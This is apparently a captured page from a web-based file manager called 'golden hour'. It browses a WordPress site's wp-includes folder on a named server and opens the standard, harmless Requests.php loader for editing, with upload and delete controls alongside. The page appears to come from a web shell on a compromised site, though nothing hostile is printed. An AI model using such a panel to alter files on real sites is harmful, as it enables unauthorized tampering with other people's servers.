golden hour
/home/godaofbq/hardchambers.com/wp-includes/Requests/library
⬆️ Go Up
Upload
File/Folder
Size
Actions
Requests.php
261 B
Del
OK
error_log
26.34 KB
Del
OK
Edit: Requests.php
<?php /** * Loads the old Requests class file when the autoloader * references the original PSR-0 Requests class. * * @deprecated 6.2.0 * @package WordPress * @subpackage Requests * @since 6.2.0 */ include_once ABSPATH . WPINC . '/class-requests.php';
Save